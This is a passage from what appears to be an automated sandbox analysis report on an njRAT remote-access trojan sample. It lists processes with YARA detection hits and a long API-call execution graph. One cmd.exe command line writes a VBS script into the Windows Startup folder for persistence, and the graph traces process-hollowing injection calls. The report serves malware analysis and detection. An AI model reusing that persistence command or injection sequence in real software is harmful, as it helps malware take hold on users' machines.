                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:17:11:59
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:17:12:11
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:10.9%
                                                                        Total number of Nodes:1147
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2343 40a280 2356 405a10 2343->2356 2345 40a2a7 2346 405a10 104 API calls 2345->2346 2347 40a2b0 SendMessageA SendMessageA GetWindowRect 2346->2347 2483 4052c0 CopyRect 2347->2483 2349 40a30b _ftol 2350 40afbe 2349->2350 2351 40a342 GetWindowRect 2350->2351 2352 40a359 2351->2352 2484 405300 CopyRect 2352->2484 2355 40a38c 2555 40b0e0 2356->2555 2359 407516 LoadLibraryA 2361 407568 LoadLibraryA 2359->2361 2363 407652 LoadLibraryA 2361->2363 2364 40766b LoadLibraryA 2363->2364 2365 407681 LoadLibraryA 2364->2365 2366 407694 LoadLibraryA 2365->2366 2367 4076a4 LoadLibraryA 2366->2367 2368 4076ba LoadLibraryA 2367->2368 2369 4076ca LoadLibraryA 2368->2369 2370 4076da LoadLibraryA 2369->2370 2371 4076ea LoadLibraryA 2370->2371 2373 4077b1 LoadLibraryA 2371->2373 2374 4077c1 LoadLibraryA 2373->2374 2375 4077d1 LoadLibraryA 2374->2375 2376 4077e7 LoadLibraryA 2375->2376 2377 4077fd LoadLibraryA 2376->2377 2378 407813 LoadLibraryA 2377->2378 2379 407829 LoadLibraryA 2378->2379 2380 40783f LoadLibraryA 2379->2380 2381 40784f LoadLibraryA 2380->2381 2382 407865 LoadLibraryA 2381->2382 2383 40787b LoadLibraryA 2382->2383 2385 407a48 2383->2385 2386 407ad3 GetModuleFileNameW 2385->2386 2388 408afd 2385->2388 2396 408e4b 2385->2396 2387 407b09 wcscpy 2386->2387 2408 407b25 wcscpy wcscat wcscpy wcscat wcscat 2386->2408 2387->2408 2390 408c26 CreateFileW 2388->2390 2391 408cf7 2388->2391 2438 408b16 2388->2438 2390->2396 2399 408c78 CreateFileW 2390->2399 2393 408d00 CreateToolhelp32Snapshot 2391->2393 2402 408e47 2391->2402 2395 408d9c Process32First 2393->2395 2393->2396 2394 408158 CreateProcessW 2398 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2394->2398 2444 408225 2394->2444 2409 408de6 Process32Next 2395->2409 2410 408e2d FindCloseChangeNotification 2395->2410 2396->2345 2400 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2398->2400 2399->2396 2401 408c99 CreateFileW 2399->2401 2400->2444 2401->2396 2403 408cbc CreateFileW 2401->2403 2402->2396 2407 408f3a CreateFileA 2402->2407 2403->2396 2406 408cdd FindCloseChangeNotification 2403->2406 2405 408272 VirtualAllocEx 2405->2444 2412 408ce7 2406->2412 2407->2396 2411 408fc7 CreateFileA 2407->2411 2408->2394 2409->2410 2413 408df7 strstr 2409->2413 2410->2345 2411->2396 2415 408fe9 CreateFileW 2411->2415 2412->2345 2417 408e3a 2413->2417 2418 408e0b strstr 2413->2418 2414 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2414->2444 2428 40903b wcslen CreateFileW 2415->2428 2416 4082b6 VirtualAllocEx 2416->2444 2417->2345 2418->2417 2419 408e1f 2418->2419 2419->2410 2419->2413 2420 408327 WriteProcessMemory 2420->2420 2420->2444 2421 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2424 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2421->2424 2421->2444 2423 40838c WriteProcessMemory 2423->2421 2423->2423 2424->2444 2425 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2427 4087f8 ResumeThread 2425->2427 2425->2444 2426 4089af ResumeThread 2426->2444 2427->2444 2429 409077 wcscat CreateFileW 2428->2429 2434 409111 2429->2434 2435 40911a VirtualAlloc 2429->2435 2430 408a4d wcscat 2433 408a77 wcsstr 2430->2433 2432 408813 Sleep CreateToolhelp32Snapshot Module32First 2432->2444 2436 408a8f CreateFileW 2433->2436 2433->2444 2434->2435 2439 409148 ReadFile 2435->2439 2436->2444 2437 408900 Wow64SuspendThread 2437->2444 2438->2345 2448 40915c FindCloseChangeNotification 2439->2448 2440 4088c8 strstr 2442 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2440->2442 2440->2444 2441 408945 ResumeThread Sleep DeleteFileW 2441->2444 2445 408977 Wow64SuspendThread 2441->2445 2442->2444 2443 408ad8 TerminateProcess 2443->2444 2444->2388 2444->2394 2444->2405 2444->2414 2444->2416 2444->2420 2444->2421 2444->2423 2444->2425 2444->2426 2444->2427 2444->2430 2444->2432 2444->2437 2444->2440 2444->2441 2444->2443 2446 408988 Sleep MoveFileExW 2444->2446 2445->2446 2446->2426 2446->2444 2450 4091c3 VirtualAlloc 2448->2450 2453 4092a3 2450->2453 2451 409b8a 2452 405a10 ExitProcess 2451->2452 2454 409bd6 2452->2454 2453->2451 2455 409409 2453->2455 2457 405a10 ExitProcess 2453->2457 2456 409be6 2454->2456 2460 405a10 ExitProcess 2454->2460 2458 409428 2455->2458 2459 405a10 ExitProcess 2455->2459 2461 409c07 2456->2461 2462 409c1e 2456->2462 2463 4093fd 2457->2463 2469 405a10 ExitProcess 2458->2469 2481 40949e 2458->2481 2468 40941c 2459->2468 2460->2456 2464 405a10 ExitProcess 2461->2464 2466 409c27 2462->2466 2467 409c3e 2462->2467 2463->2455 2465 409404 2463->2465 2474 409c12 2464->2474 2557 405a00 ExitProcess 2465->2557 2470 405a10 ExitProcess 2466->2470 2472 405a10 ExitProcess 2467->2472 2468->2458 2471 409423 2468->2471 2473 40945b 2469->2473 2476 409c32 2470->2476 2558 405a00 ExitProcess 2471->2558 2472->2396 2479 405a10 ExitProcess 2473->2479 2473->2481 2474->2345 2476->2345 2478 409a05 2478->2451 2480 405a10 ExitProcess 2478->2480 2479->2481 2480->2451 2481->2478 2482 40996b CreateProcessA Sleep TerminateProcess 2481->2482 2482->2478 2483->2349 2559 403e10 2484->2559 2486 405331 CopyRect 2487 403e10 7 API calls 2486->2487 2488 405351 CopyRect 2487->2488 2489 403e10 7 API calls 2488->2489 2490 405371 CopyRect 2489->2490 2491 403e10 7 API calls 2490->2491 2492 405391 CopyRect 2491->2492 2493 403e10 7 API calls 2492->2493 2494 4053b1 CopyRect 2493->2494 2495 403e10 7 API calls 2494->2495 2496 4053d1 CopyRect 2495->2496 2497 403e10 7 API calls 2496->2497 2498 4053f1 CopyRect 2497->2498 2499 403e10 7 API calls 2498->2499 2500 405411 CopyRect 2499->2500 2501 403e10 7 API calls 2500->2501 2502 405431 CopyRect 2501->2502 2503 403e10 7 API calls 2502->2503 2504 405451 CopyRect 2503->2504 2505 403e10 7 API calls 2504->2505 2506 405471 CopyRect 2505->2506 2507 403e10 7 API calls 2506->2507 2508 405491 CopyRect 2507->2508 2509 403e10 7 API calls 2508->2509 2510 4054b1 CopyRect 2509->2510 2511 403e10 7 API calls 2510->2511 2512 4054d1 CopyRect 2511->2512 2513 403e10 7 API calls 2512->2513 2514 4054f1 CopyRect 2513->2514 2515 403e10 7 API calls 2514->2515 2516 405511 CopyRect 2515->2516 2517 403e10 7 API calls 2516->2517 2518 405531 CopyRect 2517->2518 2519 403e10 7 API calls 2518->2519 2520 405551 CopyRect 2519->2520 2521 403e10 7 API calls 2520->2521 2522 405571 CopyRect 2521->2522 2523 403e10 7 API calls 2522->2523 2524 405591 CopyRect 2523->2524 2525 403e10 7 API calls 2524->2525 2526 4055b1 CopyRect 2525->2526 2527 403e10 7 API calls 2526->2527 2528 4055d1 CopyRect 2527->2528 2529 403e10 7 API calls 2528->2529 2530 4055f1 CopyRect 2529->2530 2531 403e10 7 API calls 2530->2531 2532 405611 CopyRect 2531->2532 2533 403e10 7 API calls 2532->2533 2534 405631 CopyRect 2533->2534 2535 403e10 7 API calls 2534->2535 2536 405651 CopyRect 2535->2536 2537 403e10 7 API calls 2536->2537 2538 405671 CopyRect 2537->2538 2539 403e10 7 API calls 2538->2539 2540 405691 CopyRect 2539->2540 2541 403e10 7 API calls 2540->2541 2542 4056b1 CopyRect 2541->2542 2543 403e10 7 API calls 2542->2543 2544 4056d1 CopyRect 2543->2544 2545 403e10 7 API calls 2544->2545 2546 4056f1 CopyRect 2545->2546 2547 403e10 7 API calls 2546->2547 2548 405711 CopyRect 2547->2548 2549 403e10 7 API calls 2548->2549 2550 405731 CopyRect 2549->2550 2551 403e10 7 API calls 2550->2551 2552 405751 CopyRect 2551->2552 2553 403e10 7 API calls 2552->2553 2554 405771 SetWindowRgn 2553->2554 2554->2355 2556 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2555->2556 2556->2359 2563 403e3a 2559->2563 2560 403fcd 2561 40404a CreatePolygonRgn 2560->2561 2562 403fdf CreatePolygonRgn 2560->2562 2569 404058 2561->2569 2564 403fef 2562->2564 2563->2560 2565 403f74 _ftol _ftol 2563->2565 2566 403ffa CombineRgn CreatePolygonRgn 2564->2566 2565->2560 2565->2565 2567 40ae02 2566->2567 2568 40401e CombineRgn 2567->2568 2568->2569 2569->2486 2955 40aac0 GetClientRect 2959 404ec0 CopyRect 2955->2959 2957 40ab29 LoadCursorA SetCursor 2958 40aae6 2958->2957 3038 403c20 2959->3038 2961 404ef1 2962 404f06 CopyRect 2961->2962 2963 404ef8 2961->2963 2964 403c20 4 API calls 2962->2964 2963->2958 2965 404f23 2964->2965 2966 404f38 CopyRect 2965->2966 2967 404f2a 2965->2967 2968 403c20 4 API calls 2966->2968 2967->2958 2969 404f55 2968->2969 2970 404f6a CopyRect 2969->2970 2971 404f5c 2969->2971 2972 403c20 4 API calls 2970->2972 2971->2958 2973 404f87 2972->2973 2974 404f9c CopyRect 2973->2974 2975 404f8e 2973->2975 2976 403c20 4 API calls 2974->2976 2975->2958 2977 404fb9 2976->2977 2978 404fc0 2977->2978 2979 404fce CopyRect 2977->2979 2978->2958 2980 403c20 4 API calls 2979->2980 2981 404feb 2980->2981 2982 405000 CopyRect 2981->2982 2983 404ff2 2981->2983 2984 403c20 4 API calls 2982->2984 2983->2958 2985 40501d 2984->2985 2986 405032 CopyRect 2985->2986 2987 405024 2985->2987 2988 403c20 4 API calls 2986->2988 2987->2958 2989 40504f 2988->2989 2990 405064 CopyRect 2989->2990 2991 405056 2989->2991 2992 403c20 4 API calls 2990->2992 2991->2958 2993 405081 2992->2993 2994 405096 CopyRect 2993->2994 2995 405088 2993->2995 2996 403c20 4 API calls 2994->2996 2995->2958 2997 4050b3 2996->2997 2998 4050c8 CopyRect 2997->2998 2999 4050ba 2997->2999 3000 403c20 4 API calls 2998->3000 2999->2958 3001 4050e5 3000->3001 3002 4050fa CopyRect 3001->3002 3003 4050ec 3001->3003 3004 403c20 4 API calls 3002->3004 3003->2958 3005 405117 3004->3005 3006 40512c CopyRect 3005->3006 3007 40511e 3005->3007 3008 403c20 4 API calls 3006->3008 3007->2958 3009 405149 3008->3009 3010 405150 3009->3010 3011 40515e CopyRect 3009->3011 3010->2958 3012 403c20 4 API calls 3011->3012 3013 40517b 3012->3013 3014 405190 CopyRect 3013->3014 3015 405182 3013->3015 3016 403c20 4 API calls 3014->3016 3015->2958 3017 4051ad 3016->3017 3018 4051c2 CopyRect 3017->3018 3019 4051b4 3017->3019 3020 403c20 4 API calls 3018->3020 3019->2958 3021 4051df 3020->3021 3022 4051f4 CopyRect 3021->3022 3023 4051e6 3021->3023 3024 403c20 4 API calls 3022->3024 3023->2958 3025 405211 3024->3025 3026 405226 CopyRect 3025->3026 3027 405218 3025->3027 3028 403c20 4 API calls 3026->3028 3027->2958 3029 405243 3028->3029 3030 405258 CopyRect 3029->3030 3031 40524a 3029->3031 3032 403c20 4 API calls 3030->3032 3031->2958 3033 405275 3032->3033 3034 40528a CopyRect 3033->3034 3035 40527c 3033->3035 3036 403c20 4 API calls 3034->3036 3035->2958 3037 4052a7 3036->3037 3037->2958 3040 403d04 3038->3040 3039 403d94 CreatePolygonRgn 3041 403dad 3039->3041 3040->3039 3042 403d37 _ftol _ftol 3040->3042 3043 403db1 PtInRegion 3041->3043 3045 403dca 3041->3045 3042->3042 3044 403d90 3042->3044 3043->3045 3044->3039 3045->2961 3054 40ac80 ExtTextOutA 3055 409c80 3064 401000 CopyRect 3055->3064 3057 409cf3 _ftol _ftol _ftol 3058 40afbe 3057->3058 3059 409d7d GetWindowRect 3058->3059 3060 409d98 3059->3060 3065 402500 CopyRect 3060->3065 3063 409dd5 3064->3057 3066 403e10 7 API calls 3065->3066 3067 402531 CopyRect 3066->3067 3396 404850 3067->3396 3069 402551 CopyRect 3070 403e10 7 API calls 3069->3070 3071 402571 CopyRect 3070->3071 3397 404850 3071->3397 3073 402591 CopyRect 3074 403e10 7 API calls 3073->3074 3075 4025b1 CopyRect 3074->3075 3398 404850 3075->3398 3077 4025d1 CopyRect 3078 403e10 7 API calls 3077->3078 3079 4025f1 CopyRect 3078->3079 3399 404850 3079->3399 3081 402611 CopyRect 3082 403e10 7 API calls 3081->3082 3083 402631 CopyRect 3082->3083 3400 404850 3083->3400 3085 402651 CopyRect 3086 403e10 7 API calls 3085->3086 3087 402671 CopyRect 3086->3087 3401 404850 3087->3401 3089 402691 CopyRect 3090 403e10 7 API calls 3089->3090 3091 4026b1 CopyRect 3090->3091 3402 404850 3091->3402 3093 4026d1 CopyRect 3094 403e10 7 API calls 3093->3094 3095 4026f1 CopyRect 3094->3095 3403 404850 3095->3403 3097 402711 CopyRect 3098 403e10 7 API calls 3097->3098 3099 402731 CopyRect 3098->3099 3404 404850 3099->3404 3101 402751 CopyRect 3102 403e10 7 API calls 3101->3102 3103 402771 CopyRect 3102->3103 3405 404850 3103->3405 3105 402791 CopyRect 3106 403e10 7 API calls 3105->3106 3107 4027b1 CopyRect 3106->3107 3406 404850 3107->3406 3109 4027d1 CopyRect 3110 403e10 7 API calls 3109->3110 3111 4027f1 CopyRect 3110->3111 3407 404850 3111->3407 3113 402811 CopyRect 3114 403e10 7 API calls 3113->3114 3115 402831 CopyRect 3114->3115 3408 404850 3115->3408 3117 402851 CopyRect 3118 403e10 7 API calls 3117->3118 3119 402871 CopyRect 3118->3119 3409 404850 3119->3409 3121 402891 CopyRect 3122 403e10 7 API calls 3121->3122 3123 4028b1 CopyRect 3122->3123 3410 404850 3123->3410 3125 4028d1 CopyRect 3126 403e10 7 API calls 3125->3126 3127 4028f1 CopyRect 3126->3127 3411 404850 3127->3411 3129 402911 CopyRect 3130 403e10 7 API calls 3129->3130 3131 402931 CopyRect 3130->3131 3412 404850 3131->3412 3133 402951 CopyRect 3134 403e10 7 API calls 3133->3134 3135 402971 CopyRect 3134->3135 3413 404850 3135->3413 3137 402991 CopyRect 3138 403e10 7 API calls 3137->3138 3139 4029b1 CopyRect 3138->3139 3414 404850 3139->3414 3141 4029d1 CopyRect 3142 403e10 7 API calls 3141->3142 3143 4029f1 CopyRect 3142->3143 3415 404850 3143->3415 3145 402a11 CopyRect 3146 403e10 7 API calls 3145->3146 3147 402a31 CopyRect 3146->3147 3416 404850 3147->3416 3149 402a51 CopyRect 3150 403e10 7 API calls 3149->3150 3151 402a71 CopyRect 3150->3151 3417 404850 3151->3417 3153 402a91 CopyRect 3154 403e10 7 API calls 3153->3154 3155 402ab1 CopyRect 3154->3155 3418 404850 3155->3418 3157 402ad1 CopyRect 3158 403e10 7 API calls 3157->3158 3159 402af1 CopyRect 3158->3159 3419 404850 3159->3419 3161 402b11 CopyRect 3162 403e10 7 API calls 3161->3162 3163 402b31 CopyRect 3162->3163 3420 404850 3163->3420 3165 402b51 CopyRect 3166 403e10 7 API calls 3165->3166 3167 402b71 CopyRect 3166->3167 3421 404850 3167->3421 3169 402b91 CopyRect 3170 403e10 7 API calls 3169->3170 3171 402bb1 CopyRect 3170->3171 3422 404850 3171->3422 3173 402bd1 CopyRect 3174 403e10 7 API calls 3173->3174 3175 402bf1 CopyRect 3174->3175 3423 404850 3175->3423 3177 402c11 CopyRect 3178 403e10 7 API calls 3177->3178 3179 402c31 CopyRect 3178->3179 3424 404850 3179->3424 3181 402c51 CopyRect 3182 403e10 7 API calls 3181->3182 3183 402c71 CopyRect 3182->3183 3425 404850 3183->3425 3185 402c91 CopyRect 3186 403e10 7 API calls 3185->3186 3187 402cb1 CopyRect 3186->3187 3426 404850 3187->3426 3189 402cd1 CopyRect 3190 403e10 7 API calls 3189->3190 3191 402cf1 CopyRect 3190->3191 3427 404850 3191->3427 3193 402d11 CopyRect 3194 403e10 7 API calls 3193->3194 3195 402d31 CopyRect 3194->3195 3428 404850 3195->3428 3197 402d51 CopyRect 3198 403e10 7 API calls 3197->3198 3199 402d71 CopyRect 3198->3199 3429 404850 3199->3429 3201 402d91 CopyRect 3202 403e10 7 API calls 3201->3202 3203 402db1 CopyRect 3202->3203 3430 404850 3203->3430 3205 402dd1 CopyRect 3206 403e10 7 API calls 3205->3206 3207 402df1 CopyRect 3206->3207 3431 404850 3207->3431 3209 402e11 CopyRect 3210 403e10 7 API calls 3209->3210 3211 402e31 CopyRect 3210->3211 3432 404850 3211->3432 3213 402e51 CopyRect 3214 403e10 7 API calls 3213->3214 3215 402e71 CopyRect 3214->3215 3433 404850 3215->3433 3217 402e91 CopyRect 3218 403e10 7 API calls 3217->3218 3219 402eb1 CopyRect 3218->3219 3434 404850 3219->3434 3221 402ed1 CopyRect 3222 403e10 7 API calls 3221->3222 3223 402ef1 CopyRect 3222->3223 3435 404850 3223->3435 3225 402f11 CopyRect 3226 403e10 7 API calls 3225->3226 3227 402f31 CopyRect 3226->3227 3436 404850 3227->3436 3229 402f51 CopyRect 3230 403e10 7 API calls 3229->3230 3231 402f71 CopyRect 3230->3231 3437 404850 3231->3437 3233 402f91 CopyRect 3234 403e10 7 API calls 3233->3234 3235 402fb1 CopyRect 3234->3235 3438 404850 3235->3438 3237 402fd1 CopyRect 3238 403e10 7 API calls 3237->3238 3239 402ff1 CopyRect 3238->3239 3439 